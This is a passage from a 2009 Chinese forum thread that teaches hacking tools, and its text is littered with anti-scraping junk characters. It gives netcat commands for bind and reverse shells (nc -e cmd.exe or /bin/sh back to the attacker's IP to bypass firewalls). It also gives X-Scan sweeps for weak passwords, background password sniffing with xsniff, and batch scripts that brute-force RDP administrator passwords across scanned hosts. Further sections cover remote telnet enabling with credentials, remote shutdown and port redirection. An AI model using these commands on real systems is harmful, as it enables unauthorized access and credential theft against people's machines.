    * E7 l  Y5 @" s: s: G-r 随机本地及远程端口0 m  a3 H9 {- s; g6 R0 r. X
    -t 使用Telnet交互方式2 q) ^7 Q# }* E$ y8 B; R" {
    -u UDP模式
    7 y2 J7 g  `7 B( v8 x-v 详细输出,用-vv将更详细/ I$ G! y* O& w; \1 h, t4 b
    -w数字 timeout延时间隔& o4 B, r9 f, @2 ~$ |$ L& d
    -z 将输入,输出关掉(用于扫锚时)
    / {0 ^/ B. K9 v6 b基本用法:& I% O, Y, D3 F( Y! u
    nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口5 F! }1 A3 J. }  {* M
    nc -l -p 80 开启本机的TCP 80端口并监听
    4 \8 A5 s4 ~9 m+ _- }" x/ U+ Tnc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口
    0 [) U' D* S, t5 e4 Pnc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口
    # A2 V2 B5 z' g* y, q0 cnc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口% V+ I( _$ P9 V! e! j
    高级用法:
      a; S" B2 A8 }9 h3 unc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止
      F" P  ?9 t* Y' [6 u9 _- Xnc -L -p 80 > c:log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:log.txt
    5 Y5 n' a5 u" N* d( j2 M$ rnc -L -p 80 < c:honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用5 C2 ~; V. ?- t
    type.exe c:honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:honeyport.txt中内容送入管道中,亦可起到传送文件作用5 X7 E* N( q( u
    本机上用:nc -l -p 本机端口: V+ U2 Z( v. `0 V: ~
    在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K; F$ }: V( g' N) Y* G. w
    nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙! t& C2 Z5 ]$ t  ?( Z6 L3 F2 E
    本机上用:nc -d -l -p 本机端口 < 要传送的文件路径及名称
    4 U8 ?4 g# Y8 D/ x1 B0 o在对方主机上用:nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机+ E! B, a4 L+ w% h) d, S3 N
    备 注:/ m1 Q' V7 A9 t$ X8 {
    | 管道命令4 u, E+ O. c: c) l' q8 D) D/ C3 y
    < 或 > 重定向命令。“<”,例如:tlntadmn < test.txt 指把test.txt的内容赋值给tlntadmn命令* P7 T$ P/ {/ n; A
    @ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:winnt >> d:log.txt 意思是:后台执行dir,并把结果存在d:log.txt中
    % U3 w" [1 T/ B>与>>的区别  ">"指:覆盖;">>"指:保存到(添加到)。
    & U! j) o! W# J# Y9 b如:@dir c:winnt >> d:log.txt和@dir c:winnt > d:log.txt二个命令分别执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果,是因为第二次的结果把第一次的覆盖了。6 o- F4 {# L4 \. }$ x2 Z9 |
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    8
     楼主| 发表于 2009-5-4 09:37:30 | 只看该作者
    八:/ W$ m2 c' ]: |" b: p: M" s
    2、扫锚工具:xscan.exe
    . U3 g4 @' _( V基本格式  a# M9 z1 c. P: m$ X
    xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息5 X* s) M0 i/ j
    xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息
    9 t( l! V9 `* U: Z) g% k5 o检测项目
    , \0 d4 j! O4 Q3 U3 `8 b1 R" p-active 检测主机是否存活
    ! N+ u6 C! T& V, g+ B2 Y4 H-os 检测远程操作系统类型(通过NETBIOS和SNMP协议), a9 |5 h' a5 N$ B2 F+ [
    -port 检测常用服务的端口状态
    . n- V9 a! A8 Z-ftp 检测FTP弱口令
    + ~3 K  a7 ^$ U. n, P3 H-pub 检测FTP服务匿名用户写权限- ]5 \  h6 T/ a* S. m' {
    -pop3 检测POP3-Server弱口令3 p, X# v9 z! Z1 S
    -smtp 检测SMTP-Server漏洞  n; d% o) c. U
    -sql 检测SQL-Server弱口令8 H0 i1 o2 N. V7 P5 @
    -smb 检测NT-Server弱口令
    % Y8 D$ [) d- @/ ]+ v  s-iis 检测IIS编码/解码漏洞* k9 W7 V! n9 C( I. p
    -cgi 检测CGI漏洞
    / w6 Q/ |0 E  }7 q2 ]8 Q-nasl 加载Nessus攻击脚本8 W' N" M1 _* H
    -all 检测以上所有项目
    " q) c  _/ A6 z/ B! @* I其它选项7 a( y( ]8 ~5 ^' `
    -i 适配器编号 设置网络适配器, <适配器编号>可通过"-l"参数获取  Z+ Q. w1 p* f1 r  B/ `. |
    -l 显示所有网络适配器$ ^9 Y9 x# }7 x" a1 h
    -v 显示详细扫描进度
    * D! s3 L5 S3 _- s+ ~-p 跳过没有响应的主机
    & U5 o' `  i5 n( i- d) Q-o 跳过没有检测到开放端口的主机
    " Q1 W& ?8 R; p2 z- g' `1 R  -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,104 o) z% j3 ], R8 A! J8 ]9 b: F/ ?- D0 Q
    -log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件): G( x( z/ c/ A+ i" S
    用法示例
    : v7 X7 G% B" `xscan -host 192.168.1.1-192.168.255.255 -all -active -p  检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机
    0 ~: @* I. K) t0 ?7 Oxscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机5 K; D' p7 }* n2 F; O# b; H% ^
    xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机  D& A. f& _5 M& b, S
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    9
     楼主| 发表于 2009-5-4 09:38:18 | 只看该作者
    九:
    7 h& e( e, [) d( L3、命令行方式嗅探器: xsniff.exe; w' d. M$ S7 Q
    可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
    7 D- y3 K/ Q' X参数说明0 L2 C& D" H* C& o+ F) Q; h
    -tcp 输出TCP数据报
    + O; x% j: w$ L7 E2 T" ^% M7 N4 r-udp 输出UDP数据报& Q" w: B7 T( L1 T
    -icmp 输出ICMP数据报
    . i. r- N) c3 \1 s8 X) s8 s( \3 V! Q$ t-pass 过滤密码信息
    * h7 {" r# K3 e, G-hide 后台运行+ ^! i' G# m0 L9 v/ j& k/ y' {
    -host 解析主机名9 e' a* v; \6 [0 _
    -addr IP地址 过滤IP地址
    # a7 i8 o( _0 B, ?2 T-port 端口 过滤端口
    6 J: ?+ C' [6 c-log 文件名 将输出保存到文件
    5 ^/ f: h0 F9 I; y) N$ D! F-asc 以ASCII形式输出: D$ `0 E+ z% G8 Y
    -hex 以16进制形式输出' b; S9 w; Q8 u: ~4 v( q9 h
    用法示例* c- H" R% o9 d/ ?
    xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中( y1 q( _3 C5 X3 @
    xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出- {# J2 P% z( {
    4、终端服务密码破解: tscrack.exe
    ; u6 g5 h1 K: v% L* I参数说明% Y% {. Y% h9 `. r
    -h 显示使用帮助
    2 _4 Q! _! F& C( K) p1 a, Q# m0 n" `-v 显示版本信息$ q, i/ R2 B' \$ h  N
    -s 在屏幕上打出解密能力
    7 [% ~* T9 F/ {6 z- X-b 密码错误时发出的声音- j8 @2 E$ v7 y; E4 d  ?' b* e" D
    -t 同是发出多个连接(多线程), {) W6 d) r6 \! h
    -N Prevent System Log entries on targeted server
    ! M, j) ]  j2 x& a& R8 w-U 卸载移除tscrack组件$ R$ w; v2 f6 s6 t  B4 Y6 h
    -f 使用-f后面的密码
    * K0 I6 `9 \( T* g; d2 H-F 间隔时间(频率)
    8 l/ A5 H2 S. _: ], l! ]-l 使用-l后面的用户名5 p: N2 W( L  u* D- o6 z# I
    -w 使用-w后面的密码字典* L6 J% U$ h: T& \
    -p 使用-p后面的密码
    2 ~* a% s+ U" ~1 ]) |-D 登录主页面4 O, x/ Z* j4 q. \6 D  y7 K& ~' r
    用法示例$ C% _0 s; Z/ R: `" z$ J
    tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的admi3 Z3 q/ m& k- r$ K8 w5 G8 V
    nistrator的登陆密码  S4 L, v: n  V* u: _9 u: F
    tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户, v' s. \: F$ A  s
    @if not exist ipcscan.txt goto noscan' X$ W! M4 W7 i, X/ V
    @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
    ! w: i% ^! ~$ q& N7 I( Rnscan
    3 @, F$ g0 Y7 H# l+ f" o@echo 3389.txt no find or scan faild$ G6 T6 Q  r; B1 h6 B9 }7 c* `
    (①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)' {6 l2 }) \2 s6 o& K9 y6 U
    3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat
    0 s$ A* v5 l# c@if not exist tscrack.exe goto noscan* Y* P  u4 `3 Q1 H3 @2 j  K
    @tscrack %1 -l administrator -w pass.dic >>rouji.txt
    & H$ U% t6 u+ B4 o, u/ C4 c:noscan
    8 C! S+ O, r. a$ O) ^7 ^@echo tscrack.exe no find or scan faild! B$ F7 O/ F" W: `8 B
    (②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结果了): X* V4 U( A3 e
    hack.bat意思是:运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码,并将破解结果保存在rouji.txt文件中。8 G7 a' b! Z  {' ]+ ?
    5、其它:8 S3 P" [: y: e$ e9 x
    Shutdown.exe2 k8 h- w, Q: H8 |% b
    Shutdown IP地址 t:20 20秒后将对方NT自动关闭(Windows 2003系统自带工具,在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。)
    # T  D: A* @2 |0 p5 B9 p: Ofpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明(端口重定向绕过防火墙)
    5 P; \( I8 c& a& Q7 ~0 D' P# ^! ~fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 当有人扫锚你的80端口时,他扫到的结果会完全是www.sina.com.cn的主机信息
    + g$ l2 L4 x# Y0 {+ R! [# K% ~Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后,就通过88端口发送到目标IP的23端口。(与目标IP建立Telnet时本机就用的88端口与其相连接)然后:直接Telnet 127.0.0.1(本机IP)就连接到目标IP的23端口了。
    ; f, U/ n4 k9 o. N: TOpenTelnet.exe (远程开启telnet工具)1 w+ ]9 ~8 B9 l0 n# ?
    opentelnet.exe IP 帐号 密码 ntlm认证方式 Telnet端口 (不需要上传ntlm.exe破坏微软的身份验证方式)直接远程开启对方的telnet服务后,就可用telnet ip 连接上对方。. R* m0 r& D2 Q) H
    NTLM认证方式:0:不使用NTLM身份验证;1:先尝试NTLM身份验证,如果失败,再使用用户名和密码;2:只使用NTLM身份验证。7 s% Z: }& T: V7 j
    ResumeTelnet.exe (OpenTelnet附带的另一个工具), i8 C* _9 R9 e
    resumetelnet.exe IP 帐号 密码 用Telnet连接完对方后,就用这个命令将对方的Telnet设置还原,并同时关闭Telnet服务。$ i2 D* K4 l3 x% z+ Q6 j
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2014-7-28 21:47
  • 签到天数: 2 天

    [LV.1]初来乍到

    10
     楼主| 发表于 2009-5-4 09:38:47 | 只看该作者
    十:
    0 J3 ^. N$ x0 E% P. W3 D3 u: C$ ]6、FTP命令详解:* F& Y! L7 t5 l. C
    FTP命令是Internet用户使用最频繁的命令之一,熟悉并灵活应用FTP的内部命令,可以大大方便使用者,并收到事半功倍之效。如果你想学习使用进行后台FTP下载,那么就必须学习FTP指令。
    % K5 J7 a) o; u) \6 b! lFTP的命令行格式为:
    * ~; n; k9 c" Y+ uftp -v -d -i -n -g [主机名] ,其中8 f$ j8 |) I  s' ~4 l1 d5 f
    -v 显示远程服务器的所有响应信息
    - S( b( P" s6 L6 p+ y' t1 K-n 限制ftp的自动登录,即不使用;.n etrc文件;6 g8 V! V( Y# K( B2 M" h
    -d 使用调试方式;; I( Z3 F5 K2 e% y" Z: |6 _5 e* Z
    -g 取消全局文件名。- Y5 P$ ]$ s( ^
    FTP使用的内部命令如下(中括号表示可选项):1 U+ S( X6 o* }
    1.![cmd[args]]:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip
    ' `5 S3 X/ I' u$ K2.$ macro-ame[args]: 执行宏定义macro-name。- A7 c: A& B, t( _) B: h
    3.account[password]: 提供登录远程系统成功后访问系统资源所需的补充口令。
    1 T$ b3 u; L: q5 z, p! l( U4.append local-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。/ i" s' e& X" `7 r$ Q7 G8 p
    5.ascii:使用ascii类型传输方式。
    7 I* |% e+ j) ?4 A% x  j6.bell:每个命令执行完毕后计算机响铃一次。
    ! f+ Y/ a5 N& o6 d' z, k8 f7.bin:使用二进制文件传输方式。% V& Y, Y- d% c7 Y: N. l  x/ I! _
    8.bye:退出ftp会话过程。
    5 [2 S6 h/ k2 p" x* ]8 ^5 z9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。  }- @! F5 v: G2 B) H; r7 h# T5 }
    10.cd remote-dir:进入远程主机目录。, O5 \0 S  s1 D9 C3 r
    11.cdup:进入远程主机目录的父目录。: N4 b0 u4 b1 F2 o0 `
    12.chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。& w3 c$ g( o( ^0 ]
    13.close:中断与远程服务器的ftp会话(与open对应)。. y- s: }. O2 g9 U0 J) ~
    14.cr:使用asscii方式传输文件时,将回车换行转换为回行。+ i) q, z' N: ?8 Z3 w% {% k5 p
    15.delete remote-file:删除远程主机文件。( y) d' z3 X! z' {
    16.debug[debug-value]:设置调试方式, 显示发送至远程主机的每条命令,如:deb up 3,若设为0,表示取消debug。( m  ]0 R* r& N; i/ x! h1 k
    17.dir[remote-dir][local-file]:显示远程主机目
    回复 支持 反对

    使用道具 举报

    本版积分规则

    关闭

    下沙大学生网推荐上一条 /1 下一条

    快速回复 返回顶部 返回列表